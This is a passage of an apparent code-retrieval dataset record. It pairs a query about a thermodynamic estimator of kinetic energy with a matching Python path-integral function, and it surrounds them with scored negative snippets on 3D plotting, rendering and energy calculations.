in L if isinstance(v, dbz)]\n\n a = setSideBySide(L[1:4])\n b = setSideBySide([L[4],L[0],L[5]]) #bug fixed 2013-11-22\n c = setSideBySide(L[6:9])\n #output = setUpDown([a,b,c])\n output = setUpDown([c, b, a]) # 2013-11-22 \n output.name = L[1].name + ', ' + L[2].name + ', ' + L[3].name + '\\n' +\\\n L[4].name + ', ' + L[0].name + ', ' + L[5].name + '\\n' +\\\n L[6].name + ', ' + L[7].name + ', ' + L[8].name\n return output", "def __c3dSeg(self, bg, seg, tgPng, scale, opacity):\n for axes in ['x', 'y', 'z']:\n cmd = 'c3d ' + bg + ' -scale ' + scale + ' ' + seg + ' '\n cmd += '-foreach -slice ' + axes + ' 50% -endfor '\n cmd += '-oli ' + os.path.join(self.toadDir, \"templates/lookup_tables/\") + 'FreeSurferColorLUT_ItkSnap.txt ' + opacity + ' -type uchar -omc ' + axes + '.png'\n self.launchCommand(cmd)\n cmd = 'pngappend x.png + y.png + z.png ' + tgPng\n self.launchCommand(cmd)\n cmd = 'rm x.png y.png z.png'\n self.launchCommand(cmd)", "def show_skeletons(self, skel_2d, z_out, z_gt=None):\n fig = plt.figure(figsize=(20, 20))\n ax1 = fig.add_subplot(1, 2, 1)\n ax2 = fig.add_subplot(1, 2, 2, projection='3d')\n edges = np.array([[1, 0], [0, 2],[2, 3], [3, 4], [0, 5], [5, 6], [6, 7]])\n\n ax_2d = ax1\n ax_3d = ax2\n\n # draw 3d\n for edge in edges:\n ax_3d.plot(skel_2d[0, edge], z_out[edge], skel_2d[1, edge], color='r')\n if z_gt is not None:\n ax_3d.plot(skel_2d[0, edge], z_gt[edge], skel_2d[1, edge], color='g')\n\n ax_3d.set_aspect('equal')\n ax_3d.set_xlabel(\"x\"), ax_3d.set_ylabel(\"z\"), ax_3d.set_zlabel(\"y\")\n ax_3d.set_xlim3d([-2, 2]), ax_3d.set_ylim3d([2, -2]), ax_3d.set_zlim3d([2, -2])\n ax_3d.view_init(elev=10, azim=-45)\n\n # draw 2d\n for edge in edges:\n ax_2d.plot(skel_2d[0, edge], skel_2d[1, edge], color='r')\n\n ax_2d.set_aspect('equal')\n ax_2d.set_xlabel(\"x\"), ax_2d.set_ylabel(\"y\")\n ax_2d.set_xlim([-2, 2]), ax_2d.set_ylim([2, -2])\n\n plt.show()", "def full_3d(self, quantity):\n # The data just tells you what integer grid point you are on. Not what actual x,y coordinate you\n # are at\n x = np.arange(0, self.period, self.dx)\n y = np.arange(0, self.period, self.dy)\n z = np.arange(0, self.height + self.dz, self.dz)\n points = np.array(list(itertools.product(z, x, y)))\n # Get the scalar\n scalar = self.get_scalar_quantity(quantity)\n labels = ('X [um]', 'Y [um]', 'Z [um]', quantity)\n # Now plot!\n self.scatter3d(points[:, 1], points[:, 2], points[\n :, 0], scalar.flatten(), labels, 'full_3d')", "def drawBoard(self):\r\n self.outer.draw(self.surface)\r\n self.background.draw(self.surface)\r\n for point in self.points:\r\n point.draw(self.surface)\r\n point.drawCheckers(self.surface)\r\n self.dice.draw(self.surface)\r\n self.message.draw(self.surface)\r\n self.checkerBox.draw(self.surface)\r\n self.checkerBox.drawCheckers(self.surface)\r\n for bar in self.bar:\r\n bar.draw(self.surface)\r\n bar.drawCheckers(self.surface)\r\n pygame.display.flip()", "def draw(self):", "def show_vertex_colors():\n if bpy.app.version > (2, 80, 0):\n for area in bpy.context.screen.areas:\n if area.type == 'VIEW_3D':\n for space in area.spaces:\n if space.type == 'VIEW_3D':\n space.shading.type = 'SOLID'\n space.shading.color_type = 'VERTEX'", "def force_show(sub_Idx):\n force_path = './dataset/subj_' + f'{sub_Idx:02d}'+ '/forces/force_' + f'{sub_Idx:02d}' + '.txt'\n image_path = './dataset/subj_' + f'{sub_Idx:02d}'+ '/images/'\n force_num = len(glob.glob(image_path + '*.jpg'))\n force_list = load_force_txt(force_path,force_num)\n print('showing '+f'{force_num:03d}'+ ' raw forces for subject ' + f'{sub_Idx:02d}')\n\n fig = plt.figure(figsize = (10, 7)) \n ax = plt.axes(projection =\"3d\") \n\n for x, y, z in force_list:\n ax.scatter3D(x, y, z, color = \"green\")\n ax.set_xlabel('X-axis', fontweight ='bold') \n ax.set_ylabel('Y-axis', fontweight ='bold') \n ax.set_zlabel('Z-axis', fontweight ='bold')\n plt.title(\"3D force data\") \n plt.show()", "def draw(self):\n #for (x, y) in self.coords:\n # pyxel.rect(\n # (x + self.x) * 4,\n # (y + self.y) * 4,\n # (x + self.x) * 4 + 3,\n # (y + self.y) * 4 + 3,\n # self.color)", "def render(self):\n\n theta = self.angle*math.pi/180.0\n cth = math.cos(theta)\n sth = math.sin(theta)\n pts = []\n cornerpts = []\n\n for vertex in self.points:\n x = vertex[0] + self.pos[0] - self.anchor[0]\n y = vertex[1] + self.pos[1] - self.anchor[1]\n\n xt = x * cth - y * sth\n yt = x * sth + y * cth\n\n x = xt + self.anchor[0]\n y = yt + self.anchor[1]\n\n cornerpts.append([x,y])\n pts.append(gr.Point(self.scale * x, self.win.getHeight() - self.scale*y))\n\n self.corners = cornerpts\n self.vis = [gr.Polygon(pts)]", "def render(self):\r\n super().render()\r\n layers, titles, latVect, lonVect = self.make_layers()\r\n LON, LAT = np.meshgrid(lonVect, latVect)\r\n lon = LON.flatten()\r\n lat = LAT.flatten()\r\n for i in range(len(layers)):\r\n vals = layers[i].flatten()\r\n hovertext = []\r\n for k in range(len(vals)):\r\n hovertext.append('lon: {:.2f}<br>lat: {:.2f}<br>{}: {:.1e}'.format(lon[k], lat[k], self.variable + self.unit,vals[k]))\r\n if self.levels == 0:\r\n data = [\r\n go.Heatmap(\r\n x=lon,\r\n y=lat,\r\n z=vals,\r\n colorscale=self.cmap,\r\n zmin=self.vmin,\r\n zmax=self.vmax,\r\n hoverinfo='text',\r\n text=hovertext \r\n )\r\n ]\r\n elif self.levels > 0:\r\n data = [\r\n go.Contour(\r\n x=lon,\r\n y=lat,\r\n z=vals,\r\n colorscale=self.cmap,\r\n hoverinfo='text',\r\n text=hovertext, \r\n connectgaps=False,\r\n contours=dict(\r\n coloring='heatmap',\r\n showlabels=True,\r\n start=self.vmin,\r\n end=self.vmax,\r\n size=(self.vmax-self.vmin) / float(self.levels)\r\n )\r\n # line=dict(smoothing=0.85) \r\n )\r\n ] \r\n\r\n\r\n layout = go.Layout(\r\n autosize=False,\r\n title=titles[i],\r\n width=self.width,\r\n height=self.height,\r\n xaxis={'title': self.xlabel},\r\n yaxis={'title': self.ylabel}\r\n ) \r\n\r\n\r\n\r\n if self.surface3D:\r\n data = [\r\n go.Surface(\r\n x=lonVect,\r\n y=latVect,\r\n z=layers[i],\r\n colorscale=self.cmap,\r\n # hoverinfo='text',\r\n # text=hovertext \r\n )\r\n ]\r\n\r\n layout = go.Layout(\r\n autosize=False,\r\n title=titles[i],\r\n width=self.width,\r\n height=self.height,\r\n scene = dict(\r\n xaxis={'title': self.xlabel},\r\n yaxis={'title': self.ylabel},\r\n zaxis={'title': self.variable + self.unit}\r\n )\r\n ) \r\n\r\n\r\n self._save_plotly_(go, data, layout)", "def plots(x_bef,y_bef,z_bef):\r\n # Makes a 3-D plot of the x, y and z axes representing the ball's total trajectory\r\n plt.figure(3)\r\n plot3 = plt.axes(projection=\"3d\")\r\n plot3.plot3D(x_bef,y_bef,z_bef,'blue')\r\n plot3.set_xlabel('x (ft)')\r\n plot3.set_ylabel('y (ft)')\r\n plot3.set_zlabel('z (ft)')\r\n plot3.set_title('Total Trajectory')\r\n \r\n # Makes a 2-D plot of the x, and z axes representing the ball's total 2-D trajectory\r\n plt.figure(4)\r\n plt.plot(x_bef,z_bef)\r\n plt.xlabel('x (ft)')\r\n plt.ylabel('z (ft)')\r\n plt.title('z (ft) vs x (ft)')\r\n plt.show()", "def draw():\n screen.fill((0, 0, 0))\n alien.draw()", "def cube_vertices(x, y, z, n):\n #def cube_vertices(self):\n # \"\"\" Return the vertices of the cube at position x, y, z with size 2*n.\n #\n # \"\"\"\n # return [\n # x-n,y+n,z-n, x-n,y+n,z+n, x+n,y+n,z+n, x+n,y+n,z-n, # top\n # x-n,y-n,z-n, x+n,y-n,z-n, x+n,y-n,z+n, x-n,y-n,z+n, # bottom\n # x-n,y-n,z-n, x-n,y-n,z+n, x-n,y+n,z+n, x-n,y+n,z-n, # left\n # x+n,y-n,z+n, x+n,y-n,z-n, x+n,y+n,z-n, x+n,y+n,z+n, # right\n # x-n,y-n,z+n, x+n,y-n,z+n, x+n,y+n,z+n, x-n,y+n,z+n, # front\n # x+n,y-n,z-n, x-n,y-n,z-n, x-n,y+n,z-n, x+n,y+n,z-n, # back\n # ]\n return [\n x-n,y+n,z-n, x-n,y+n,z+n, x+n,y+n,z+n, x+n,y+n,z-n, # top\n x-n,y-n,z-n, x+n,y-n,z-n, x+n,y-n,z+n, x-n,y-n,z+n, # bottom\n x-n,y-n,z-n, x-n,y-n,z+n, x-n,y+n,z+n, x-n,y+n,z-n, # left\n x+n,y-n,z+n, x+n,y-n,z-n, x+n,y+n,z-n, x+n,y+n,z+n, # right\n x-n,y-n,z+n, x+n,y-n,z+n, x+n,y+n,z+n, x-n,y+n,z+n, # front\n x+n,y-n,z-n, x-n,y-n,z-n, x-n,y+n,z-n, x+n,y+n,z-n, # back\n ]", "def draw(self, view):\n self._wall.draw(view)\n self._paddle.draw(view)\n self._ball.draw(view)", "def draw3DPts(pcl_1, pcl_2=None, color_1=None, color_2=None):\n input_size_1 = list(pcl_1.size() )\n B = input_size_1[0]\n C = input_size_1[1]\n N1 = input_size_1[2]\n if pcl_2 is not None:\n input_size_2 = list(pcl_2.size() )\n N2 = input_size_2[2]\n\n pcl_1_cpu = pcl_1.cpu().numpy()\n if pcl_2 is not None:\n pcl_2_cpu = pcl_2.cpu().numpy()\n if color_1 is not None:\n color_1_cpu = color_1.cpu().numpy()\n else:\n color_1_cpu = None\n if color_2 is not None:\n color_2_cpu = color_2.cpu().numpy()\n else:\n color_2_cpu = None\n \n \n for i in range(B):\n # fig = plt.figure(i)\n # ax = fig.gca(projection='3d')\n # plt.cla()\n\n pcd_o3d_1 = np_batch_to_o3d_pcd(i, pcl_1_cpu, color_1_cpu)\n\n if pcl_2 is not None:\n pcd_o3d_2 = np_batch_to_o3d_pcd(i, pcl_2_cpu, color_2_cpu)\n draw_pcls(pcd_o3d_1, pcd_o3d_2, uniform_color=color_1 is None)\n else:\n draw_pcls(pcd_o3d_1, uniform_color=color_1 is None)\n\n # plt.axis('equal')\n # plt.show()\n # plt.gca().set_aspect('equal')\n # plt.gca().set_zlim(-10, 10)\n # plt.gca().set_zlim(0, 3.5)", "def viewer(\n self, units='nm', \n draw_edges=True, draw_vertices=True,\n color_by='radius'\n ):\n try:\n import matplotlib.pyplot as plt\n from mpl_toolkits.mplot3d import Axes3D \n from matplotlib import cm\n except ImportError:\n print(\"Skeleton.viewer requires matplotlib. Try: pip install matplotlib --upgrade\")\n return\n\n RADII_KEYWORDS = ('radius', 'radii', 'r')\n COMPONENT_KEYWORDS = ('component', 'components', 'c')\n\n fig = plt.figure(figsize=(10,10))\n ax = Axes3D(fig)\n ax.set_xlabel(units)\n ax.set_ylabel(units)\n ax.set_zlabel(units)\n\n # Set plot axes equal. Matplotlib doesn't have an easier way to\n # do this for 3d plots.\n X = self.vertices[:,0]\n Y = self.vertices[:,1]\n Z = self.vertices[:,2]\n\n max_range = np.array([X.max()-X.min(), Y.max()-Y.min(), Z.max()-Z.min()]).max() / 2.0\n\n mid_x = (X.max()+X.min()) * 0.5\n mid_y = (Y.max()+Y.min()) * 0.5\n mid_z = (Z.max()+Z.min()) * 0.5\n ax.set_xlim(mid_x - max_range, mid_x + max_range)\n ax.set_ylim(mid_y - max_range, mid_y + max_range)\n ax.set_zlim(mid_z - max_range, mid_z + max_range)\n ### END EQUALIZATION CODE ###\n\n component_colors = ['k', 'deeppink', 'dodgerblue', 'mediumaquamarine', 'gold' ]\n\n def draw_component(i, skel):\n component_color = component_colors[ i % len(component_colors) ]\n\n if draw_vertices:\n xs = skel.vertices[:,0]\n ys = skel.vertices[:,1]\n zs = skel.vertices[:,2]\n\n if color_by in RADII_KEYWORDS:\n colmap = cm.ScalarMappable(cmap=cm.get_cmap('rainbow'))\n colmap.set_array(skel.radii)\n\n normed_radii = skel.radii / np.max(skel.radii)\n yg = ax.scatter(xs, ys, zs, c=cm.rainbow(normed_radii), marker='o')\n cbar = fig.colorbar(colmap)\n cbar.set_label('radius (' + units + ')', rotation=270)\n elif color_by in COMPONENT_KEYWORDS:\n yg = ax.scatter(xs, ys, zs, color=component_color, marker='.')\n else:\n yg = ax.scatter(xs, ys, zs, color='k', marker='.')\n\n if draw_edges:\n for e1, e2 in skel.edges:\n pt1, pt2 = skel.vertices[e1], skel.vertices[e2]\n ax.plot( \n [ pt1[0], pt2[0] ],\n [ pt1[1], pt2[1] ],\n zs=[ pt1[2], pt2[2] ],\n color=(component_color if not draw_vertices else 'silver'),\n linewidth=1,\n )\n\n if color_by in COMPONENT_KEYWORDS:\n for i, skel in enumerate(self.components()):\n draw_component(i, skel)\n else:\n draw_component(0, self)\n\n plt.show()", "def plot_all(self) -> None:\n self.__plot_si_cf_plane()\n self.__plot_convex_hull()\n self.__plot_fixed_radius()\n self.__plot_delaunay()", "def plot(self, plotEdges=False, emphaseEdges=[], col=('b', 'k', 'r'), lims=None, ort=False):\n ax = a3.Axes3D(plt.figure())\n ax.set_xlabel('x')\n ax.set_ylabel('y')\n ax.set_zlabel('z')\n ax.dist = 30\n ax.azim = -140\n if lims is None:\n lims = [0, 0, 0]\n lims[0] = [min(v.x for v in self.vertices),\n max(v.x for v in self.vertices)]\n lims[1] = [min(v.y for v in self.vertices),\n max(v.y for v in self.vertices)]\n lims[2] = [min(v.z for v in self.vertices),\n max(v.z for v in self.vertices)]\n if ort:\n ma = max(lims[i][1] for i in range(3))\n mi = min(lims[i][0] for i in range(3))\n lims = [[mi, ma]] * 3\n ax.set_xlim(lims[0])\n ax.set_ylim(lims[1])\n ax.set_zlim(lims[2])\n for f in self.faces:\n face = a3.art3d.Poly3DCollection([[v.coords()\n for v in f.vertices]])\n ax.add_collection3d(face)\n face.set_facecolor(col[0])\n face.set_edgecolor(col[1])\n if plotEdges or len(emphaseEdges)>0:\n for e in self.edges:\n edge = a3.art3d.Poly3DCollection([[e.nvt.coords(),\n e.pvt.coords()]])\n ax.add_collection3d(edge)\n if e in emphaseEdges:\n edge.set_edgecolor(col[2])\n else:\n edge.set_edgecolor(col[1])\n plt.show()", "def drawFace():\r\n\tglPushMatrix()\r\n\tglTranslatef(-0.5,-0.5,0)\r\n\tglBegin(GL_LINE_LOOP)\r\n\t\r\n\tglVertex3f(0,VALUE,0)\r\n\tglVertex3f(VALUE,0,0)\r\n\t\r\n\tglVertex3f(LENGTH-VALUE,0,0)\r\n\tglVertex3f(LENGTH,VALUE,0)\r\n\t\r\n\tglVertex3f(LENGTH,LENGTH-VALUE,0)\r\n\tglVertex3f(LENGTH-VALUE,LENGTH,0)\r\n\t\r\n\tglVertex3f(VALUE,LENGTH,0)\r\n\tglVertex3f(0,LENGTH-VALUE,0)\r\n\t\r\n\tglEnd()\r\n\tglPopMatrix()", "def c_3D(G, nombre):\n print(\"Pasando grafo a formato tridimensional...\")\n aDir = os.getcwd()\n d = dict(G.degree)\n \n Nodes = list(G.nodes)\n N = len(Nodes)\n Edges = pasar_na_num(G)\n\n Grafo = ig.Graph(Edges, directed=True)\n layt = Grafo.layout('kk', dim=3)\n Xn = [layt[k][0] for k in range(N)] # x-coordinates of nodes\n Yn = [layt[k][1] for k in range(N)] # y-coordinates\n Zn = [layt[k][2] for k in range(N)] # z-coordinates\n Xe = []\n Ye = []\n Ze = []\n\n for e in Edges:\n Xe += [layt[e[0]][0], layt[e[1]][0], None] # x-coordinates of edge ends\n Ye += [layt[e[0]][1], layt[e[1]][1], None]\n Ze += [layt[e[0]][2], layt[e[1]][2], None]\n\n trace1 = go.Scatter3d(x=Xe,\n y=Ye,\n z=Ze,\n mode='lines',\n line=go.scatter3d.Line(\n color=\"black\",\n colorscale=\"Blues\",\n width=3\n ),\n hoverinfo='none'\n )\n\n trace2 = go.Scatter3d(x=Xn,\n y=Yn,\n z=Zn,\n mode='markers',\n name='notes and chords',\n marker=dict(symbol='circle',\n size=6,\n color=list(d.values()),\n colorscale='Greens',\n line=dict(color='rgb(50,50,50)', width=0.5)\n ),\n text=Nodes,\n hoverinfo=\"text\"\n )\n\n axis = dict(showbackground=False,\n showline=False,\n zeroline=False,\n showgrid=False,\n showticklabels=False,\n title=''\n )\n\n layout = go.Layout(\n title=\"Grafo de la partitura {0}\".format(nombre),\n paper_bgcolor='rgba(0,0,0,0)',\n plot_bgcolor='rgba(0,0,0,0)',\n width=1000,\n height=1000,\n showlegend=False,\n scene=dict(\n xaxis=dict(axis),\n yaxis=dict(axis),\n zaxis=dict(axis),\n ),\n margin=dict(\n t=100\n ),\n hovermode='closest',\n )\n\n data = [trace1, trace2]\n figure = go.Figure(data=data, layout=layout)\n figure.write_html(\"{0}/3DGraphs/3D_Graph_{1}.html\".format(aDir,nombre))\n print(\"Listo.\")\n figure.show()", "def render_3d(projection, **kwds):\n if isinstance(projection, Polyhedron): projection = Projection(projection)\n return \\\n projection.render_vertices_3d(width=3, color='green', **kwds) +\\\n projection.render_wireframe_3d(width=3, color='green', **kwds) + \\\n projection.render_solid_3d(**kwds)" ]
[ "0.67704284", "0.6621511", "0.6335428", "0.62092894", "0.612173", "0.6121571", "0.6106901", "0.60958236", "0.6095626", "0.6073754", "0.60695255", "0.60470665", "0.6022389", "0.60214126", "0.6004602", "0.5997901", "0.5991583", "0.5977998", "0.59440416", "0.59368646", "0.59315884", "0.59279937", "0.59252447", "0.59048986", "0.5894956", "0.58754414", "0.5870859", "0.586726", "0.5861615", "0.58570975", "0.5853422", "0.5817661", "0.5803974", "0.5792202", "0.5784058", "0.57831466", "0.57784176", "0.5777871", "0.5773006", "0.5771206", "0.5762533", "0.5736443", "0.57299304", "0.5724259", "0.57127875", "0.5708261", "0.57042485", "0.5693814", "0.5676734", "0.56591415", "0.56518304", "0.5640212", "0.5609678", "0.5581681", "0.558094", "0.5577973", "0.5566226", "0.5565511", "0.5562278", "0.5560169", "0.55594456", "0.5558807", "0.554439", "0.55435884", "0.55435884", "0.55435884", "0.55435884", "0.55435884", "0.55435884", "0.55435884", "0.55435884", "0.55382013", "0.55342454", "0.55189764", "0.55171525", "0.5504374", "0.5501347", "0.5501319", "0.5498615", "0.5498137", "0.5487336", "0.5486955", "0.54859585", "0.5475209", "0.5460329", "0.54576826", "0.545477", "0.545151", "0.5446897", "0.5433189", "0.5429748", "0.54296994", "0.54285264", "0.5426068", "0.541877", "0.540232", "0.54009116", "0.5390817", "0.53828835", "0.5376878" ]
0.6539542
2
thermodynmic estimator of the kinetic energy
def thermodynamic_kinetic(paths,lam,tau): nslice,nptcl,ndim,nconf = paths.shape ke = ndim*nptcl/2./tau * np.ones(nconf) for islice in range(nslice): r2_arr = (paths[islice]-paths[(islice+1)%nslice])**2. # (nptcl,ndim,nconf) r2 = r2_arr.sum(axis=0).sum(axis=0) # (nconf,) ke -= r2/(4.*lam*tau**2.)/nslice return ke
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def price_heston_mc(kappa_,theta_,sigma_,rho_,r_,T_,L_,V0_,S0_,K0_,N_):\r\n esp_ = monte_carlo(kappa_,theta_,sigma_,rho_,r_,T_,L_,V0_,S0_,K0_,N_)\r\n return exp(-r_*T_)*esp_", "def kineticEnergy(self):\n return self.params['kinetic']", "def energyK(k):\r\n C1 = 9.7846113e-07\r\n C2 = 12.263868e0 \r\n E = (-1.0 + np.sqrt(1.0 + 4.0 * C1 * C2**2 * k**2))/(2.0 * C1)\r\n return E", "def _UpdateEnergy(self):\n self.mol.GetEnergy('nokinetic')", "def kinetic_energy(self):\r\n return self.mass * np.dot(self.vel, self.vel) / 2", "def kinetic_energy(self, sys):\n v = sys.velocities\n m = sys.mass\n return 0.5*np.dot(m, np.multiply(v, v))", "def energy_function(self, x):\n \n return -T.dot(T.transpose(x), T.dot(self.W, x)) -\\\n T.dot(T.transpose(self.b), x)", "def get_E(J,k):\n E = -2 * J * np.cos(k) # energyeigenvalue \n return E", "def _k(self, T):\n RT = Rgas * T\n return (self.parameters.A1 / np.exp(self.parameters.E1 / RT),\n self.parameters.A2 / np.exp(self.parameters.E2 / RT))", "def calculate_ttw_energy(self) -> None:\n\n self.energy = self.ecm.motive_energy_per_km(\n driving_mass=self[\"driving mass\"],\n rr_coef=self[\"rolling resistance coefficient\"],\n drag_coef=self[\"aerodynamic drag coefficient\"],\n frontal_area=self[\"frontal area\"],\n electric_motor_power=self[\"electric power\"],\n engine_power=self[\"power\"],\n recuperation_efficiency=self[\"recuperation efficiency\"],\n aux_power=self[\"auxiliary power demand\"],\n battery_charge_eff=self[\"battery charge efficiency\"],\n battery_discharge_eff=self[\"battery discharge efficiency\"],\n fuel_cell_system_efficiency=self[\"fuel cell system efficiency\"],\n )\n\n self.energy = self.energy.assign_coords(\n {\n \"powertrain\": self.array.powertrain,\n \"year\": self.array.year,\n \"size\": self.array.coords[\"size\"],\n \"value\": self.array.coords[\"value\"],\n }\n )\n\n if self.energy_consumption:\n self.override_ttw_energy()\n\n distance = self.energy.sel(parameter=\"velocity\").sum(dim=\"second\") / 1000\n\n self[\"engine efficiency\"] = (\n np.ma.array(\n self.energy.loc[dict(parameter=\"engine efficiency\")],\n mask=self.energy.loc[dict(parameter=\"power load\")] == 0,\n )\n .mean(axis=0)\n .T\n )\n\n _o = lambda x: np.where((x == 0) | (x == np.nan), 1, x)\n\n if self.engine_efficiency is not None:\n print(\"Engine efficiency is being overridden.\")\n for key, val in self.engine_efficiency.items():\n pwt, size, year = key\n if (\n (val is not None)\n & (pwt in self.array.powertrain.values)\n & (year in self.array.year.values)\n & (size in self.array[\"size\"].values)\n ):\n self.array.loc[\n dict(\n powertrain=pwt,\n size=size,\n year=year,\n parameter=\"engine efficiency\",\n )\n ] = float(val)\n\n self.energy.loc[\n dict(\n powertrain=pwt,\n size=size,\n year=year,\n parameter=\"engine efficiency\",\n )\n ] = float(val) * np.where(\n self.energy.loc[\n dict(\n parameter=\"power load\",\n powertrain=pwt,\n size=size,\n year=year,\n )\n ]\n == 0,\n 0,\n 1,\n )\n\n self.energy.loc[\n dict(\n powertrain=pwt,\n size=size,\n year=year,\n parameter=\"motive energy\",\n )\n ] = self.energy.loc[\n dict(\n powertrain=pwt,\n size=size,\n year=year,\n parameter=\"motive energy at wheels\",\n )\n ] / (\n _o(\n self.energy.loc[\n dict(\n powertrain=pwt,\n size=size,\n year=year,\n parameter=\"engine efficiency\",\n )\n ]\n )\n * _o(\n self.energy.loc[\n dict(\n powertrain=pwt,\n size=size,\n year=year,\n parameter=\"transmission efficiency\",\n )\n ]\n )\n )\n\n self[\"transmission efficiency\"] = (\n np.ma.array(\n self.energy.loc[dict(parameter=\"transmission efficiency\")],\n mask=self.energy.loc[dict(parameter=\"power load\")] == 0,\n )\n .mean(axis=0)\n .T\n )\n\n if self.transmission_efficiency is not None:\n print(\"Transmission efficiency is being overridden.\")\n for key, val in self.transmission_efficiency.items():\n pwt, size, year = key\n\n if (\n (val is not None)\n & (pwt in self.array.powertrain.values)\n & (year in self.array.year.values)\n & (size in self.array[\"size\"].values)\n ):\n self.array.loc[\n dict(\n powertrain=pwt,\n size=size,\n year=year,\n parameter=\"transmission efficiency\",\n )\n ] = float(val)\n\n self.energy.loc[\n dict(\n powertrain=pwt,\n size=size,\n year=year,\n parameter=\"transmission efficiency\",\n )\n ] = float(val) * np.where(\n self.energy.loc[\n dict(\n parameter=\"power load\",\n powertrain=pwt,\n size=size,\n year=year,\n )\n ]\n == 0,\n 0,\n 1,\n )\n\n self.energy.loc[\n dict(\n powertrain=pwt,\n size=size,\n year=year,\n parameter=\"motive energy\",\n )\n ] = self.energy.loc[\n dict(\n powertrain=pwt,\n size=size,\n year=year,\n parameter=\"motive energy at wheels\",\n )\n ] / (\n _o(\n self.energy.loc[\n dict(\n powertrain=pwt,\n size=size,\n year=year,\n parameter=\"engine efficiency\",\n )\n ]\n )\n * _o(\n self.energy.loc[\n dict(\n powertrain=pwt,\n size=size,\n year=year,\n parameter=\"transmission efficiency\",\n )\n ]\n )\n )\n\n self[\"TtW energy\"] = (\n self.energy.sel(\n parameter=[\"motive energy\", \"auxiliary energy\", \"recuperated energy\"]\n ).sum(dim=[\"second\", \"parameter\"])\n / distance\n ).T\n\n self[\"TtW energy, combustion mode\"] = self[\"TtW energy\"] * (\n self[\"combustion power share\"] > 0\n )\n self[\"TtW energy, electric mode\"] = self[\"TtW energy\"] * (\n self[\"combustion power share\"] == 0\n )\n\n self[\"auxiliary energy\"] = (\n self.energy.sel(parameter=\"auxiliary energy\").sum(dim=\"second\") / distance\n ).T", "def verhulst(nb_init, t0, tf, eps, methode, gamma, K) :\n f=lambda y,t : gamma*y*(1-y/K)\n Y=meth_epsilon(nb_init, t0, tf, eps, f, methode)\n return Y", "def get_data_term(self):\n \n if self.num_hidden == 0:\n \n data_term = -self.compute_energy(self.x, self.batch_size)\n \n else:\n \n data_term = -self.compute_free_energy(self.x)\n \n return T.sum(T.exp(-data_term))", "def kinetic_energy(self):\r\n position, velocity, escaped_particles,impact, wall_collision,mom = self.box_collision_info()\r\n for j in xrange(1,self.n):\r\n abs_velocity = np.sqrt(velocity[:,0]**2+velocity[:,1]**2\r\n + velocity[:,2]**2)\r\n KE = 0.5*self.m*abs_velocity**2\r\n total_KE = np.sum(KE)\r\n invid_KE = total_KE/self.Npart\r\n\r\n return total_KE, invid_KE", "def kinetic_energy(self, units = 'si'):\n if units == 'si':\n return 0.5 * self.mass * (linalg.norm(self.velocity) ** 2)\n if units == 'au':\n return 0.5 * self.mass * (linalg.norm(self.velocity * (1.496e11) * 86400) ** 2)", "def total_energy(state, k=1, m=1):\n return 0.5*k*state[..., 0]*state[..., 0]+0.5*m*state[..., 1]*state[..., 1]", "def Kg(T, D):\n# return 2.10*np.ones(np.shape(T)) #at 0 degC\n# return Kg0*np.exp(Kg1*T)\n KiT=Kg0*np.exp(Kg1*T)\n return (2.*KiT*D)/(3.-D)", "def KineticEnergy(self):\n return Particle.TotalEnergy(self) - Particle.RestEnergy(self)", "def kinetic_energies(self):\n return sum([body.kinetic_energy\n for body in self.bodies])", "def kinetic_energy(traj, tend=80):\n # Resample trajectory at regular intervals\n dt = 0.2\n dxdt = traj.sample(tlo=5, thi=tend, dt=dt, precise=True)['y']\n # Use simple Riemann sum to estimate kinetic energy cost\n KE = sum(dxdt**2)*dt\n return KE", "def internalenergy(temp,pres):\n g = liq_g(0,0,temp,pres)\n g_t = liq_g(1,0,temp,pres)\n g_p = liq_g(0,1,temp,pres)\n u = g - temp*g_t - pres*g_p\n return u", "def kinetic_energy(self, KE):\n # Creating an axis for the time steps\n x = np.linspace(0, self.t, self.N*self.t+1)\n # Initializing the figure\n plt.figure(figsize=(10, 10))\n # Creating the plot\n plt.plot(x, KE)\n # Decorating the plot\n plt.suptitle('Total kinetic energy in the Earth-Sun system.', fontsize=24)\n plt.xlabel('time [yr]', fontsize=16)\n plt.ylabel('energy [AU²*kg/yr²]', fontsize=16)\n plt.legend(['KE'])", "def calc_k(self):\n\t\n\tself.k = -np.array([self.sth*self.cphi, self.sth*self.sphi, self.cth])\n\n\treturn", "def compute_energy_density(kT):\n h=u.planck\n c=u.speed_of_light\n pi=np.pi\n return (8*pi/(h*c)**3)*((pi*kT)**4/15)", "def e_kinetic(self, q = np.zeros(2) , dq = np.zeros(2) , R_index = 0 ): \n \n Ha = self.H_all( q , R_index ) \n \n e_k = 0.5 * np.dot( dq , np.dot( Ha , dq ) )\n \n return e_k", "def e_kinetic(self, q = np.zeros(2) , dq = np.zeros(2) , R_index = 0 ): \n \n Ha = self.H_all( q , R_index ) \n \n e_k = 0.5 * np.dot( dq , np.dot( Ha , dq ) )\n \n return e_k", "def KPMO(XVal,YVal_State_1,YVal_State_2,YVal_State_3,XVal_Mean_Trans_1,XVal_Mean_Trans_2,XVal_Sig_Trans_1,XVal_Sig_Trans_2,iOpt):\n#\t1. Computations:\n\tTiny=1E-20\n\tP_Trans_1 = fCPD(XVal,XVal_Mean_Trans_1, XVal_Sig_Trans_1) # Transition of kerogen from State #1 to State #2\n\tP_Trans_2 = fCPD(XVal,XVal_Mean_Trans_2, XVal_Sig_Trans_2) # Transition of kerogen from State #2 to State #3\n\tFunVal=0\n\tif(iOpt==0):\n\t\tP_State_1=(1-P_Trans_1)*(1-P_Trans_2)\n\t\tP_State_2=P_Trans_1*(1 - P_Trans_2)\n\t\tP_State_3=1-P_State_1-P_State_2\n\t\tFunVal=(YVal_State_1*P_State_1)+(YVal_State_2*P_State_2)+(YVal_State_3*P_State_3)\n\tif(iOpt==1):\n\t\tFunVal=YVal_State_1+P_Trans_1*YVal_State_2+P_Trans_2*YVal_State_3\n\tif(FunVal==0):\n\t\tFunVal=Tiny\n\treturn FunVal", "def kinetic_energy(v, Mm=1.):\n speed_squared = v[:, 0] ** 2 + v[:, 1] ** 2\n # timeit.timeit('vt[:,0]**2+vt[:,1]**2', setup='import numpy as np; vt = np.random.rand(10000,2)', number=1000)\n KE = 0.5 * sum(Mm * speed_squared)\n return KE", "def energy_func(self):\n i = self.inl[0].to_flow()\n o = self.outl[0].to_flow()\n\n T_m = (T_mix_ph(i, T0=self.inl[0].T.val_SI) +\n T_mix_ph(o, T0=self.outl[0].T.val_SI)) / 2\n\n return (i[0] * (o[2] - i[2]) -\n self.A.val * (\n self.E.val * self.eta_opt.val -\n (T_m - self.Tamb.val_SI) * 